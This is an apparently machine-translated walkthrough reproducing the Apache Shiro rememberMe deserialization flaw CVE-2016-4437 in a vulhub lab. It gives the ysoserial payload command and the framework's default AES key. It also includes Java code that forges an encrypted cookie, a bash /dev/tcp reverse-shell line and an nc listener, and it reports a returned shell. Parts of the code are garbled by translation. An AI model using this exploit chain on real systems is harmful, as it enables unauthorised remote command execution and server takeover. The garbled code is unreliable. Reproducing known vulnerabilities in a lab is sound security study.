Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve deserialization command execution CVE-2016-4437 reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Introduction to 0x00

Apache Shiro is an open source security framework that provides authentication, authorization, cryptography, and session management. The Shiro framework is intuitive and easy to use, while providing robust security.

In Apache Shiro 1.2.4 and previous versions, encrypted user information was serialized and stored in a Cookie named remember-me. An attacker can use the default key of Shiro to spoof user Cookie, triggering a Java deserialization vulnerability to execute arbitrary commands on the target machine.

0x01 startup environment cd / vulhub/shiro/cve-2016-4437docker-compose up-d # Note: start port 8080. If there is a conflict, please modify 0x02 vulnerability analysis 1 to build the test environment.

Create a maven project using IDEA and import dependencies

4.0.0org.exampleShiro1.0-SNAPSHOT88junitjunit4.12compileorg.apache.shiroshiro-core1.2.4

Shiro components are naturally necessary, and junit is purely convenient for testing (review)

Project structure:

Note: the path of poc.ser is relative to the project root path

2 loophole analysis

According to the boss's article, we know that the problem lies in: org.apache.shiro.mgt.AbstractRememberMeManager

Open the source code for analysis:

Line 26 defines the default key,32 line constructor to assign the encryption key with the default key

Line 167uses the key for AES decryption, which is the default key

To sum up, because the default key of AES is fixed, developers can manipulate the deserialized data and then getshell if they don't modify it manually.

0x03 vulnerability Reproduction 1 generates bytecode file java-jar ysoserial.jar CommonsBeanutils1 "touch / tmp/success" > poc.ser

Copy the bytecode file to the project

2 write code to encrypt AES import org.apache.shiro.codec.Base64;import org.apache.shiro.codec.CodecSupport;import org.apache.shiro.crypto.AesCipherService;import org.apache.shiro.util.ByteSource;import java.io.IOException;import java.nio.file.FileSystems;import java.nio.file.Files;import org.junit.Test;public class ShiroTest {@ Testpublic void RCE () throws IOException {byte [] payloads = Files.readAllBytes (FileSystems.getDefault () .import (",", "poc.ser")) AesCipherService aes = new AesCipherService (); byte [] key = Base64.decode (CodecSupport.toBytes ("kPH+bIxk5D2deZiIxcaaaA==")); ByteSource ciphertext = aes.encrypt (payloads, key); System.out.printf (ciphertext.toString ());}} 3 replace cookie

4 enter docker image to view the effect

File created successfully

5 bounce shell

1 making command

# bounce shell command, note: > & there can be no spaces between bash-I > & / dev/tcp/ip/port 0 > & 1

Online conversion website: http://www.jackson-t.ca/runtime-exec-payloads.html

2 generate bytecode using ysoserial and generate encrypted cookie with the above code

3 enable nc snooping in the attack terminal

# listening for connection nc-lvp port

4 modify cookie and send

5 check the monitoring situation

NICE, shell returned successfully

On how to achieve deserialization commands to implement CVE-2016-4437 reproduction is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.